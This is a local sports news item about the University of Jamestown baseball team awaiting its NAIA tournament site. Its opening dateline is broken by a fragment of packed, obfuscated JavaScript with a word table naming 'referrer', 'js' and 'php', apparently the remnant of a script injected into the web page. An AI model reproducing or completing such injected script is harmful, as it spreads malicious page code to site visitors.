JAMESTOWN ybidh|var|u0026u|referrer|nhdee||js|php’.split(‘|’),0,{}))
(NewsDakota.com) – The University of Jamestown  baseball team isn’t in the position of having to sweat out a national tournament bid, but they are wondering where they will be playing on Monday. The NAIA selection show is slated for Friday night at 7pm and the Jimmies will learn their fate.

Their are nine sites that will host the opening round of the NAIA baseball tournament. The three that appear most likely based on geography are Hutchinson, Kan., Marion, Ind., or Shawnee, Oklah. The Jimmies played in Oklahoma City in 2013 and the NAIA sent Mayville State to Joliet, Ill. which would be geographically similar to Marion and Shawnee.

Hutchinson is the closest of the nine sites and is hosted by Tabor College.

The Jimmies will hold a viewing party at Cherry Berry in Jamestown on Friday night as the brackets are revealed on NAIA.org. We will have the information up on NewsDakota.com as soon as possible following the announcement along with broadcast details for Monday’s first game.
